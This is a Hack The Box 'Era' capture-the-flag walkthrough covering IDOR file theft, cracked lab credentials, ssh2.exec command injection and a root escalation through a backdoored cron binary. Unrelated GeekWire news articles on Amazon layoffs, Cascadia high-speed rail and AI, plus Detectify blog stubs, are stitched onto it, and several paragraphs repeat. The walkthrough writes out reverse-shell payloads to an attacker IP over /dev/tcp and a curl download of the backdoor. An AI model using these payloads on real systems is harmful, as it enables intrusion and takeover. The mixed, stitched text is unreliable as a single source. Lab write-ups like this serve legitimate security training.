Introduction:

In this writeup, we will explore the “Era” machine from Hack The Box, categorized as an Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Era” machine from Hack The Box by achieving the following objectives:

User Flag:

Initial enumeration revealed a hidden virtual host file.era.htb and a simple file-sharing web application that allowed registration and login. After creating an account, it quickly became clear that the download.php endpoint suffered from a severe Insecure Direct Object Reference (IDOR) vulnerability: any authenticated user could access any file on the platform simply by guessing its numeric ID. By fuzzing IDs 1–5000, two admin-uploaded archives were retrieved – a complete site backup containing the source code and SQLite database, and a signing.zip archive containing an SSH private key. The leaked database also exposed clear-text credentials, including eric:america. Because the ssh2 PHP extension was loaded on the server, the ssh2:// stream wrapper could be abused through the same vulnerable download endpoint.

Root Flag:

While exploring the system as eric, a root-owned executable /opt/AV/periodic-checks/monitor was discovered that runs periodically via cron (confirmed by entries in status.log). The binary performed a custom integrity check using a digital signature stored in an ELF section named .text_sig. Using objcopy, the legitimate signature was extracted from the original binary. On the attacker’s machine, a malicious statically linked reverse-shell binary (monitor_backdoor) was compiled, and the legitimate .text_sig section was injected into it with objcopy –add-section. The backdoored binary was then transferred to the target and used to overwrite the original monitor executable (the directory was world-writable). When the cron job next executed, the malicious binary ran as root and immediately connected back, delivering a root shell. The root flag was then read directly from /root/root.txt, completing the compromise.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

Nmap Output:

Analysis:

• Port 22 (SSH): Secure Shell service for remote access.
• Port 80 (HTTP): Web server running Apache.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

Gobuster DNS scan on era.htb finishes with no subdomains found — clean miss on the big wordlist. Time to dig deeper or move to vhost/directory brute.

Discovering the Hidden Virtual Host with ffuf

ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) — jackpot! That’s our real target. Add to /etc/hosts and move in.

ffuf virtual-host brute on era.htb reveals file.era.htb (302 redirect + different response size) — jackpot! That’s our real target. Add to /etc/hosts and move in.

ffuf with -fw 4 (filter responses with exactly 4 words) nails it — file.era.htb returns 200 + 6765 bytes while everything else 302s with tiny bodies. Clear hit, that’s our hidden subdomain. Add to hosts and go!

Exploitation

Web Application Exploration:

Accessing http://era.htb shows the Era Designs homepage—a clean marketing site with navigation (Home, Services, About, Portfolio, Clients, Team, Contact) and a hero section featuring yellow vases, a white sofa, and “SUCCESS OF YOUR BUSINESS” text with a “FIND OUT MORE” button.

Burp shows a clean GET to http://era.htb → 200 OK from nginx/1.18.0 (Ubuntu). Response is a standard Bootstrap-styled marketing page titled “Era Designs” with no forms or backend endpoints – just a static landing site. Nothing juicy here.

Clean “Welcome to Era Storage!” page with four big blue buttons: Manage Files, Upload Files, Update Security Questions, and Sign In. This is the main hub of the entire app.

Very minimal registration: only two fields – Username and Password. No email, no captcha, no security questions during signup.

Forgot-password bypass: enter username and answer the three hardcoded questions (mother’s maiden name, first pet, city of birth).

Classic centred login box with Username + Password on a blue-green gradient background – the page we’re redirected to after registration.

Successful POST to /register.php → 200 OK + automatic redirect to login.php. Account creation confirmed.

After picking a new username (e.g., “dark”), registration succeeds and the app displays: “Registration successful! Redirecting to login page…” → account creation is instant and working.

POST to /login.php with username=dark&password=admin123 returns 302 Found → Location: manage.php and sets a PHPSESSID cookie. We are now authenticated as the “dark” user.

GET to /manage.php with the same PHPSESSID cookie returns 200 OK and the full HTML of the logged-in dashboard (title: “Era – Manage”).

The main post-login page “Manage Your Files & Settings” shows:

• Left sidebar: Manage Files, Upload Files, Update Security Questions, Sign Out
• Main area: auto-delete timer setting, empty file list (“You haven’t uploaded any files yet.”), Reset Security Questions button This is the fully authenticated user panel — our foothold is confirmed.

Malicious PHP Upload → Direct Shell

Authenticated view of /upload.php. Simple file upload form titled “Upload Files” with a “Browse…” button (currently “No files selected.”) and a blue “Upload” button. No restrictions visible on file type or size yet.

Same upload page, but now the user has selected a harmless file named dark.txt. Shows the form ready to submit — this is just confirming normal upload functionality works.

After uploading dark.txt, the app redirects to /download.php?id=6615 and shows “Your Download Is Ready!” with the filename and a download button. Key observation: files are accessed via a numericid` parameter → classic candidate for Insecure Direct Object Reference (IDOR).

After clicking “Upload”, the app displays a green “Upload Successful!” banner and immediately provides a direct download link in the format: http://file.era.htb/download.php?id=6615 This confirms uploads work and every file gets its own numeric ID — setting the stage for IDOR testing and potential privilege escalation via file access across users.

Legitimate request to http://file.era.htb/download.php?id=6615 returns the expected “Your Download Is Ready!” page with our uploaded file dark.txt. Confirms the download endpoint works normally for files we own.

Appending ?dl=true to the same request (download.php?id=6615&dl=true) bypasses the pretty download page and triggers an immediate file download:

• Content-Type: application/octet-stream
• Content-Disposition: attachment; filename=”dark.txt” This is extremely useful for scripting/automation because we get the raw file without HTML.

Quickly create a list of all possible numeric file IDs from 1 to 5000. This will be used for brute-forcing the id parameter in download.php to find other users’ files.

Database Leak & Credential Extraction

Final setup in Burp Intruder:

• Target: http://file.era.htb
• Payload position marked on the id parameter (id=6615 → id=§6615§)
• Payload type: Numbers 1 → 5000 (simple list)
• ?dl=true added so every hit immediately downloads the raw file instead of showing HTML Ready to launch the attack that will download every single file ever uploaded by any user on the platform.

Burp Intruder attack against download.php?id=§§&dl=true using the 1–5000 payload list. All responses are 200 OK and exactly 7969 bytes long — including our own known file. This tells us there is no authorization check at all; every single existing file ID returns the exact same response length, meaning the server happily serves any file the numeric ID points to → confirmed horizontal Insecure Direct Object Reference (IDOR).

After confirming the IDOR on download.php?id=, we generate a list of IDs 1–5000 (seq 1 5000 > num.txt) and fuzz with ffuf, injecting our authenticated cookie and filtering out responses with exactly 3161 words (the empty download page). Only two IDs survive: 54 and 150. Both return much larger responses (~2552 words), indicating real files.

Insecure Direct Object Reference (IDOR)

Accessing http://file.era.htb/download.php?id=54 reveals the filename site-backup-30-08-24.zip. This is the full source code backup of the Era file-sharing web app, uploaded by the admin.

Response headers confirm we’re downloading the raw site-backup-30-08-24.zip (2006697 bytes). The body starts with PK header (ZIP magic bytes).

Accessing http://file.era.htb/download.php?id=150 shows signing.zip. This smaller archive contains a private key and possibly a signing script – likely for code signing or authentication.

Response forces download of signing.zip (2746 bytes). This archive contains the admin’s private key (id_rsa) and a script – the golden ticket for SSH access as the admin/user.

Source Code Review – Key Vulnerabilities Exposed in the Leak

After downloading IDs 54 and 150 via IDOR, we extract both ZIPs. One is site-backup-30-08-24.zip (clearly a website backup) and the other is signing.zip.

This is the full source code of the Era web application, straight from the admin’s upload (ID 54). Key files visible during extraction:

• download.php, upload.php, index.php – core functionality
• filedb.sqlite – the SQLite database storing users, sessions, and file metadata
• files/ directory – where uploaded files are stored on disk
• functions.global.php, initial_layout.php, etc. – backend logic
• .htaccess, login.php, logout.php – authentication flow

With this backup in hand, we now have everything:

• Complete code review capability
• The database (filedb.sqlite) to dump credentials or session secrets
• Exact knowledge of how the IDOR works internally

This is the live SQLite database powering the entire Era application – straight from the admin’s site backup we downloaded via IDOR.

We’ve opened the real filedb.sqlite from the site backup and immediately listed the tables. As expected:

• users → stores usernames, password hashes, etc.
• files → maps numeric IDs to real filenames and owners (confirms the IDOR logic)

After extracting the site backup, we opened the leaked filedb.sqlite and dumped the users table with SELECT * FROM users;. The result reveals six accounts, including the admin (ID 1) with the bcrypt hash $2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and a fake email “Maria Oliver | Ottawa”. The other five users (eric, veronica, yuri, john, ethan) also have proper bcrypt hashes. This gives us every credential on the box in plain text (hash) form, but we don’t even need to crack anything — the signing.zip we downloaded via the same IDOR already contains the admin’s SSH private key. The database dump is just the cherry on top, confirming total information disclosure and proving the IDOR let us steal every secret the application ever had. We’re now one ssh -i id_rsa admin@file.era.htb away from both flags.

Cracking the Leaked Hashes with John the Ripper

We dumped the users table into hash.txt for cracking. It contains six bcrypt hashes, including the admin’s: admin_ef01cab31aa:$2y$10$wDbohsUaezF74d3SMNRPi.o93wDxJqphM2m0VVup41If6WrYi.QPC and the other five regular users.

John instantly cracks two weak passwords:

• america → eric
• mustang → yuri

The rest (including admin) remain uncracked in the short run.

Both attempts fail with Connection refused.

This confirms that only key-based authentication is allowed on the box (port 22 is open but rejects password logins entirely). The weak passwords we just cracked (america, mustang) are useless for SSH — the server is correctly hardened against password auth.

Alternative way to obtain the user flag

This is the “Update Security Questions” page from the Era web app, captured while logged in as the admin (admin_ef01cab31aa). The admin literally set all three security-question answers to admin

The server happily accepted it and responded with the green banner: “If the user exists, answers have been updated — redirecting…”

This confirms that there is no validation for security-question updates. Any logged-in user can silently overwrite anyone else’s answers (including the admin’s) without knowing the old ones. Combined with the predictable username (admin_ef01cab31aa visible in the UI), this is a second, independent path to full account takeover via the forgot-password flow.

Screenshot shows a settings panel designed for managing uploaded files and controlling their retention time. At the top, an option allows automatic deletion to be enabled, letting the user choose a specific time interval and unit before files are removed. Below the settings, the interface lists existing uploaded files, such as dark.txt, which can be selected and deleted using the Delete Selected Files button. Additional options, including returning to the home page and resetting security questions, provide quick access to important account functions. Overall, the panel centralizes file management, privacy controls, and routine account maintenance.

Screenshot shows a login fallback page that allows access through security questions instead of a password. The interface displays the username along with three predefined security questions: mother’s maiden name, first pet’s name, and city of birth. Each answer field has been filled with the value admin, suggesting that the account uses weak or predictable answers. After providing the answers, the user can click Verify and Log In to gain access. Overall, the page functions as an alternative authentication method, typically intended for account recovery when the main password is unavailable.

The auto-deletion feature is enabled, configured to remove uploaded items after 10 weeks. Two files are currently present—site-backup-30-08-24.zip and signing.zip—both of which can be selected for removal using the red action button. The sidebar on the left offers quick links for browsing files, uploading new ones, modifying security questions, and signing out of the session. Overall, the page offers a simple layout for organizing uploaded content and managing basic account settings.

FTP Enumeration (Local-Only vsFTPd – Optional Side Discovery)

Attacker logs into the target’s own vsftpd service (running on 10.10.11.79) using credentials yuri:yuri. Login succeeds instantly.

Inside the FTP session, dir shows only two directories: apache2_conf and php8.1_conf. Nothing else is present.

Inside the FTP session (logged in as yuri), the attacker runs dir in the root directory and sees only four small Apache configuration files:

• 000-default.conf (1.3 KB)
• apache2.conf (7 KB)
• file.conf (222 bytes)
• ports.conf (320 bytes)

Gaining User Shell – ssh2 Stream Wrapper RCE

After cd php8.1_conf, another dir reveals a long list of standard PHP 8.1 extension .so files (calendar.so, exif.so, ftp.so, pdo.so, phar.so, sqlite3.so, etc.). No interesting or custom files appear.

The internal vsFTPd instance is nothing more than a poorly chrooted service that accidentally exposes Apache configuration files and the real PHP extension directory. It provides zero writable paths, no sensitive data beyond what we already knew, and no escalation value. Just a nice confirmatory easter egg that the ssh2 extension is indeed loaded — but completely unnecessary for either the user or root compromise.

Screenshot reveals successful exploitation of an unrestricted file retrieval flaw on file.era.htb. Attacker submits a malicious GET request to download.php, weaponizing PHP’s ssh2.exec stream wrapper alongside command injection. Payload inside id parameter uses ssh2.exec://eric:america@127.0.0.1/ then pipes a base64-encoded reverse shell that instructs victim host to initiate connection toward attacker address 10.10.14.189 on port 9007. Flawed script directly feeds user-supplied input into readfile() or equivalent without validation. PHP detects ssh2.exec wrapper, authenticates locally via SSH as user eric using password america, executes hostile command, and returns resulting output (nearly empty) as response body. Web server replies with 200 OK and 136 bytes of data, confirming reverse shell triggered successfully. Exploit highlights classic stream-wrapper abuse transforming simple download vulnerability into complete remote code execution.

This second capture shows a polished version of the same remote code execution attack against download.php on file.era.htb. Attacker now places a cleaner payload inside the format parameter: ssh2.exec://eric:america@127.0.0.1/bash -c ‘bash -i >/dev/tcp/10.10.14.189/9007 0>&1’ followed by |base64 -d |bash. After URL decoding, PHP interprets the ssh2.exec wrapper, authenticates to localhost SSH as user eric using password america, runs the quoted reverse-shell command, decodes any remaining base64 payload if needed, and finally spawns an interactive bash session that connects back to 10.10.14.189:9007. Server returns HTTP 200 OK with a 153-byte body containing wrapper startup messages, confirming successful command execution. Compared to the previous attempt, this refined one-liner removes unnecessary encoding layers while remaining effective, proving the attacker now enjoys a stable reverse shell on the target system.

Attacker stuffs this tightly-encoded string into the format parameter:

ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%22bash%20-i%3E%26/dev/tcp/10.10.14.189/9007%200%3E%261;true%27

Once decoded, PHP sees:

ssh2.exec://eric:america@127.0.0.1/bash -c “bash -i>&/dev/tcp/10.10.14.189/9007 0>&1;true'”

Every dangerous character (< > &) appears percent-encoded, slipping past basic filters. The trailing ;true’ cleanly terminates the command and avoids breaking bash syntax. No base64 gymnastics required.

PHP dutifully opens a local SSH session as user eric with password america, runs the quoted command, and instantly redirects all shell I/O over TCP to 10.10.14.189:9007. Result: a clean, stable, fully interactive reverse shell that survives repeated use. Target machine now belongs to the attacker.

On the attack machine, netcat listens on port 9007 (nc -lvnp 9007). As soon as the final ssh2.exec payload hits download.php, the target instantly connects back from IP 10.10.11.79. Shell lands as user eric on hostname era (prompt: eric@era:~$)

Eric managed to read user.txt and obtained the flag

Escalate to Root Privileges Access

Privilege Escalation:

Eric runs sudo -l to check which sudo privileges are available. The system replies that a terminal and password are required, meaning eric has no passwordless sudo rights and cannot directly escalate using sudo.

Eric executes find / -perm 4000 2>/dev/null to hunt for SUID binaries system-wide. The command returns no results (screen stays empty), indicating no obvious SUID files exist that could be abused.

Eric navigates to /opt and runs ls. Output shows a single directory named AV. This immediately catches attention — custom software installed under /opt is a classic spot for privilege-escalation vectors on HTB machines.

Eric enters /opt/AV/periodic-checks and runs ls. Two files appear: monitor (a root-owned executable) and status.log. The presence of a root-owned binary in a writable directory strongly suggests this monitor program runs periodically as root (likely via cron) and will be the intended privilege-escalation target.

I runs strings monitor. Among normal library calls, two crucial strings appear: “[] System scan initiated…” and “[] No threats detected. Shutting down…”. These exact strings match the log entries, proving monitor is the binary executed by root during each scan.

I checks status.log in /opt/AV/periodic-checks. The log shows the monitor binary runs periodically as root, prints “[*} System scan initiated…”, then “[SUCCESS] No threats detected.” – confirming it is a scheduled root job and the real escalation target.

Custom Binary Signature Bypass

We tries to open a file called dark.c inside /dev/shm but vi fails with “command not found”. This reveals the reverse shell lacks a proper $PATH and most binaries – a common issue with raw /dev/tcp shells.

On the attacker’s local machine, the file dark.c contains a simple malicious payload: a single system() call that spawns another reverse shell back to 10.10.14.189:9007. The attacker has prepared this source code to compile and drop on the target.

On the attacker’s local machine, gcc compiles the malicious dark.c source into a statically linked binary named monitor_backdoor – a perfect drop-in replacement for the legitimate monitor program.

I uses curl http://10.10.14.189/monitor_backdoor -o monitor_backdoor to download the final backdoored binary from the attacker’s web server directly into the current directory (or /dev/shm). The transfer completes successfully (754 KB at ~1.4 MB/s).

The stage is now set: once the original monitor binary is replaced with this backdoor, the next root cron execution will instantly grant a root shell back to the attacker.

Command such as objcopy –dump-section .text_sig=sig /opt/AV/periodic-checks/monitor to extract the original monitor binary’s .text_sig section (a custom digital signature) and save it as a file called sig inside /dev/shm.

I runs objcopy –add-section .text_sig=sig monitor_backdoor, injecting the legitimate signature extracted from the real monitor into the malicious backdoored version. This preserves the signature so the root-run scanner will accept the fake binary.

To completes the attack by overwriting the legitimate monitor binary with the backdoored version: cp monitor_backdoor /opt/AV/periodic-checks/monitor The root-owned executable that runs periodically via cron is now fully replaced.

The cron job fires, executes the backdoored monitor as root, and the payload instantly triggers. Attacker catches a new reverse shell that lands directly as root@era: ~#. The box is fully compromised.

Root reads the final flag immediately after gaining the privileged shell

The post Hack The Box: Era Machine Walkthrough – Medium Difficulity appeared first on Threatninja.net.

This week on the GeekWire Podcast: Why is Amazon laying off 14,000 people in the middle of an AI boom — and is it really a boom at all? We dig into the contradiction at the heart of Seattle’s tech scene, discussing Amazon CEO Andy Jassy’s “world’s largest startup” rationale and what it says about the company’s culture and strategy. And we debate whether AI progress represents true transformation or the familiar signs of a tech bubble in the making.

Then we examine the vision of Cascadia high-speed rail — the ambitious plan to connect Portland, Seattle, and Vancouver, B.C., by bullet train. Is it the regional infrastructure needed to power the Pacific Northwest’s next chapter, or an expensive dream looking for a purpose?

With GeekWire co-founders John Cook and Todd Bishop

Related headlines from the week

Amazon layoffs

• Amazon confirms 14,000 job cuts, says push for ‘efficiency gains’ will continue into 2026
• A tale of two Seattles in the age of AI: Harsh realities and new hope for the tech community
• Filing: Amazon cuts more than 2,300 jobs in Washington state as part of broader layoffs
• Amazon layoffs hit software engineers hardest in Washington
• Amazon layoffs reaction: ‘Thought I was a top performer but guess I’m expendable’
• Amazon CEO says massive corporate layoffs were about agility — not AI or cost-cutting

Amazon earnings

• Amazon stock soars 11% after topping Q3 estimates with $180B in revenue, $21B in profits
• Amazon’s Anthropic investment boosts its quarterly profits by $9.5B
• ‘Big Beautiful’ tax benefit: Amazon and other tech giants reap the rewards of new law, for now

Microsoft Azure, earnings and OpenAI

• Microsoft’s Azure reports cloud outage, disrupting global customers including Alaska Airlines
• Microsoft beats expectations, reports nearly $35B in Q1 capital spending amid Azure outage
• Microsoft gets 27% stake in OpenAI, and a $250B Azure commitment

Seattle-Portland-Vancouver

• Slowly but surely, high-speed rail backers believe Cascadia mega-project will become a reality
• Cascadia’s AI paradox: A world-leading opportunity threatened by rising costs and a talent crunch
• The ‘enormous barrier’ that threatens economic growth in the Pacific Northwest
• Beta’s unique electric airplane flies into Seattle to wow state officials and aviation experts

Subscribe to GeekWire in Apple Podcasts, Spotify, or wherever you listen.

Leaders in the Pacific Northwest are largely bullish on the region’s continued economic success — but one threat to the region’s fiscal progress worries them in particular.

“What always strikes me, whether I’m in City Hall in Vancouver or Seattle or Portland, is that everybody talks about the same thing — the high cost of housing,” said Microsoft President Brad Smith at this week’s Cascadia Innovation Corridor conference in Seattle.

“It’s become an enormous barrier, not just for attracting new talent, but for enabling teachers and police officers and nurses and firefighters to live in the communities in which they serve,” he added.

Dr. Tom Lynch, president and director of Seattle’s Fred Hutch Cancer Center, was more succinct.

“My people can’t find places to live,” Lynch said during a Tuesday panel at the same event.

Those concerns are bolstered by research in a new report on the economic viability of the corridor running from Vancouver, B.C., through Seattle to Portland.

Housing costs were cited as one of the top threats to the region’s success, noting that Vancouver’s housing-cost-to-income-ratio disparity is among the worst in the world, while in Seattle median home prices relative to wages have doubled in the past 15 years. Portland reports a net out-migration as workers move to more affordable areas.

Other concerns include rising business costs and regulations, declining numbers of skilled workers and new restrictions on foreign talent immigrating to the U.S., and clean energy shortages.

“We’ve got to find ways to be able to increase the density of our housing, come up with creative solutions for allowing more families to be able to live close to where the jobs are,” Lynch said.

Smith agreed, adding, “The only way to dig ourselves out of this is to harness the power of the market through public-private partnerships, to recognize that zoning and permitting needs to be put to work to accelerate investment.”

Area tech giants have been pursuing those partnerships to tackle the challenge.

In 2019, Microsoft pledged $750 million to boost the affordable housing inventory and has helped build or retain 12,000 units in the region. Amazon in recent years has committed $3.4 billion for housing across three hubs nationally where it has large operations. The company in September celebrated a milestone of building or preserving 10,000 units in the Seattle area.

Despite the efforts, Smith said the shortage keeps worsening and in 2025, new construction starts are expected to be the lowest since before the Great Recession.

The city of Seattle, for one, is looking to sweeten a property-tax exemption deal for developers that could encourage construction and it’s also applying AI to permitting process in an effort to speed up projects.

Smith also promoted the long-held vision of a high-speed rail line in the Pacific Northwest that would make commutes much faster between growing urban hubs. But a panel Wednesday cautioned that dream is still many years out.

Ten years into a dream to connect Vancouver, B.C., Seattle and Portland via a high-speed rail line, stakeholders and backers of the mega-project said Wednesday that they’re still very much onboard — and to prepare for a long trip.

With a lengthy and uncertain timeline ahead, former U.S. Secretary of Transportation Ray LaHood, a speaker at the Cascadia Innovation Corridor conference in Seattle, cautioned many of those in attendance that they likely won’t live long enough to see high-speed rail in the Pacific Northwest.

“When you build big things, they cost big money,” LaHood said. “It took us 50 years to build the interstate system.”

LaHood said the key is to “get on board” now so that “our children and grandchildren” will reap the benefits.

At Cascadia Innovation Corridor’s annual event this week, much of the focus was on how to strengthen the cross-border partnership between three growing cities and numerous locales in between. Leaders discussed ideas around innovation, housing affordability, sustainability, and economic development. They signed a Memorandum of Reaffirmation to solidify commitments.

And Wednesday was about the enhanced transportation connectivity that could help drive it all, and the work that lies ahead in building a coalition of public and political support across the region, securing funding, jumpstarting planning, and more. Even producing videos like the new one below is part of the massive outreach under way.

Former Washington Gov. Chris Gregoire, Cascadia Innovation Corridor’s chair, said that a decade ago, high-speed rail was just an idea. The next decade can be a defining one.

“You would have thought we were thinking of doing something in outer space by the reaction,” she said. “Today, it is much more than an idea, and we are actually moving forward. While we do have a long way to go, as you well know, we’re funding the first phase of planning built on one of the most unique coalitions in North America.”

Envisioning a mega-region akin to Silicon Valley, in which Vancouver, Seattle and Portland are each only an hour apart, Gregoire highlighted the possibilities that could come with high-speed mobility.

“A UW student can intern in Vancouver, a family in Puget Sound can explore a job in Portland, and a cancer researcher in Vancouver can get home for dinner after a shift in Seattle,” she said. “It’s a new way of living, working and connecting, one that expands what’s possible for everyone who calls Cascadia home.”

The pace to make the dream a reality has been anything but high-speed.

In 2017, Microsoft — which has an office in downtown Vancouver — gave $50,000 to a $300,000 effort led by Washington state to study a high-speed train proposal. In 2021, officials from Washington, Oregon and British Columbia signed a memorandum of understanding to form a committee to coordinate the plan.

Last year, the Federal Railroad Administration awarded the Washington State Department of Transportation $49.7 million to develop a service development plan for Cascadia High-Speed Rail. A timeline on WSDOT’s website points to 2028 for estimated completion of that plan, and for 2029 and beyond it simply says, “future phases to be determined.”

Cascadia is not alone in its quest for high-speed rail.

LaHood, a Republican cabinet member in the Obama administration, recalled the former president’s commitment to rail transportation. He said the Trump administration “clawing back” $4 billion in funding for California’s high-speed rail project between San Francisco and Los Angeles should not be considered a “death knell,” despite challenges in that state.

LaHood pointed to Brightline train projects in Florida, connecting Orlando and Miami, and Las Vegas, with a plan to offer high-speed connectivity to Southern California. Another plan in Texas would connect Houston and Dallas. All are evidence, he said, that this mode of transportation is what Americans want in order to avoid clogged highways and airports.

“Once the politicians catch on to what the people want, boom, you get the kind of rail transportation that people are clamoring for,” LaHood said.

Here are highlights from other speakers at the conference on Wednesday:

• WSDOT Secretary Julie Meredith pointed to big Seattle transportation infrastructure projects that transformed the city, including the removal of the Alaskan Way Viaduct and construction of the SR 99 waterfront tunnel, as well as the new SR 520 floating bridge. Even as work will continue for years connecting communities via Link light rail, Meredith said, “I so often describe this program as one I’m most excited about, because it’s an opportunity for us to so fundamentally transform our region up and down the I-5 corridor,” Meredith said.
• Chelsea Levy, Cascadia High-Speed Rail project manager, said the region can expect a 25% increase in population, or about 3.4 million more people, by 2050. “This pace and magnitude of growth really requires us to act,” Levy said. Among other things, WSDOT will need to integrate with B.C. and Oregon transportation networks and, Levy stressed, the scale and complexity of the project will require a streamlining of permitting processes across the 345-mile mega-region.
• Hana Doubrava, a Vancouver-based corporate affairs director at Microsoft, leads the Cascadia initiative for the tech giant. She said the company’s support is not just symbolic, and that Microsoft believes modern, efficient transit and transportation options are essential for improved quality of life. “Cascadia is all about partnerships and relationships — despite the current geopolitics or baseball scores,” she said in a nod to Canada’s team, the Toronto Blue Jays, denying the Seattle Mariners a trip to the World Series.

Related:

• Microsoft’s Brad Smith makes nuanced AI pitch: Huge potential, real concerns, and a Jon Stewart clip
• Longterm vision for Seattle-Portland-Vancouver mega-region will require a ‘consensus on growth’
• Study: High-speed rail connecting Seattle to Vancouver BC would spur $355B in economic growth

It’s rare for a tech executive to cue up a video mocking themselves — but that’s just what Microsoft President Brad Smith did on Tuesday at the Cascadia Innovation Corridor conference in Seattle. Smith played a clip from The Daily Show in which comedian Jon Stewart lampooned his and Microsoft CEO Satya Nadella’s interviews about AI’s impact on jobs.

The segment poked fun at the idea that displaced workers might become “prompt engineers” — a new job Stewart rebranded as “types questions guy.”

It was a self-aware feature of a talk that balanced enthusiasm for artificial intelligence’s potential with sober reflections on its hype and potential pitfalls.

The Microsoft leader called AI the “next great general purpose technology” on par with electricity. He said AI will transform sectors including health, education, biotech, aerospace, agriculture, climate and others.

That was a theme during Tuesday’s event. Former Washington Gov. Chris Gregoire, who leads the Cascadia Innovation Corridor group, kicked off the day by calling AI “a defining technology of our generation.”

Smith, who in his three decades at Microsoft has witnessed tech bubbles and bursts, also offered a “breadth of perspective” on AI that he hinted might be lacking in Silicon Valley.

“In so many ways, the sky is the limit,” Smith said. “That is exciting, but I don’t want to just be another tech bro who says, ‘Hey, great, here it comes. Get ready, get out your wallet.'”

AI-driven employment threats are becoming increasingly real in the tech sector and beyond. Amazon on Tuesday announced a huge round of layoffs, slashing 14,000 corporate and tech jobs. Earlier this year Microsoft laid off 15,000 employees worldwide. The cuts aren’t all tied to AI, but many executives are talking about worker efficiency gains thanks to the tech.

Despite the recent layoffs, many industry and elected leaders in the Cascadia region, which stretches from Vancouver, B.C., through Seattle and down to Portland, see AI as a promising economic engine that can build on the area’s strong tech foundation. That includes Microsoft and Amazon as well as a growing slate of AI startups, plus institutions such as the University of Washington, University of British Columbia, Allen Institute for AI and others.

But Smith — who manages to strike a persona blending tech evangelist, politician and favorite uncle — also acknowledged concerns about disparities in AI access, whether looking locally at rural versus urban divides, or the gap between AI use in affluent and low-income countries that lack widespread electricity and internet connections.

He also tackled the meta questions around the responsible use of AI and encouraged society to get out in front of the technology with appropriate guardrails.

“What are we trying to do as an industry, as a region, as a planet, as a species? Are we trying to build machines that are better than people? Are we trying to build machines that will help people become smarter and better?” he asked.

“If the experience that we’ve all had with social media over the last 15 years teaches us anything at all,” Smith continued, “it is that the best time to ask these questions and to debate them is before technology answers them for us.”

RELATED: Cascadia’s AI paradox: A world-leading opportunity threatened by rising costs and a talent crunch

A new report exploring the potential for the Pacific Northwest to stake its claim as the global leader in responsible AI offers a paradoxical view. The Cascadia region, which includes Seattle, Portland and Vancouver, B.C., is described as a proven, promising player in the sphere — but with significant risks that threaten its success.

“We created companies that transformed global commerce,” writes former Gov. Chris Gregoire in a forward to the document. “Now we have the chance to add another chapter — one where Cascadia becomes the world’s standard-bearer for innovation that uplifts both people and planet.”

The Cascadia Innovation Corridor, which Gregoire chairs, released the report this morning as it kicks off its two-day conference. The economic advocacy group’s eighth annual event is being held in Seattle.

The study is built on an analysis by the Boston Consulting Group that ranks Cascadia’s three metro areas against 15 comparable regions in the U.S. and Canada for their economic competitiveness, including livability, workforce, and business and innovation climate. Seattle came in fourth behind Boston, Austin and Raleigh, while Portland ranked 13th and Vancouver 14th.

Over the past decade, the region’s gross domestic product and populations have both grown significantly, and when combined, their economies approach the 18th largest in the world.

Cascadia’s strengths, the report explains, include tech engines such as cloud giants Microsoft and Amazon in Washington, silicon chip manufacturing in Oregon, and quantum innovation in Vancouver, as well as academic excellence from the University of Washington, University of British Columbia and Oregon State University.

But as time goes on and as business and civic leaders aim for the prize of AI dominance, cracks in the system are increasingly troubling.

• Business costs are rising and there are mounting regulatory concerns — but it’s a tricky picture. Seattle, for example, often turns to B&O and headcount taxes to cover costs, while the state struggles to balance budgets in the absence of an income tax.
• Housing affordability is continuing to decline for many residents in these metro areas.
• Skilled tech workers are leaving Portland, in particular, and Seattle relies heavily on foreign workers receiving H1-B visas, which are less certain under the Trump administration.
• The clean, affordable energy that was once abundant in the Pacific Northwest is decreasingly available as droughts reduce river flows that drive hydropower dams and electricity demand increases with rapid data center growth.

The report notes that multiple regions around the U.S. and Canada have created AI-focused hubs with hundreds of millions of dollars in public and private funding to bolster their hold on the sector.

New Jersey has a half-billion dollar “AI Moonshot” program including tax incentives and public-worker AI training programs; New York’s “Empire AI Consortium” has an AI computing training center at the University of Buffalo and startup supports; and California has a public-private task force to increase AI adoption within government services and connecting tech leaders with state agencies.

For its part, Seattle Mayor Bruce Harrell announced a “responsible AI plan” this fall that provides guidelines for the municipality’s use of artificial intelligence and its support of the AI tech sector as an economic driver, which includes the earlier launches of the startup-focused AI House and Foundations.

But what the region really needs to succeed is a collaborative effort tapping all of the metro areas’ assets.

“For Cascadia, the lesson is clear: without a coordinated strategy that links our strengths in cloud computing, semiconductors, and research, we risk falling behind,” states the Cascadia Innovation Corridor report. “Acting together, we can position Cascadia not just to keep pace, but to lead.”

The post Lerhan: Bypassing IDOR protection with URL shorteners appeared first on Detectify Blog.

People should get surprised with RCE vulnerabilities in Javascript, but not PHP.

The post [PoC Video] jQuery-File-Upload: A tale of three vulnerabilities appeared first on Detectify Blog.

The post OWASP TOP 10: Insecure Direct Object Reference appeared first on Detectify Blog.

The post OWASP Top 10 Vulnerabilities Explained appeared first on Detectify Blog.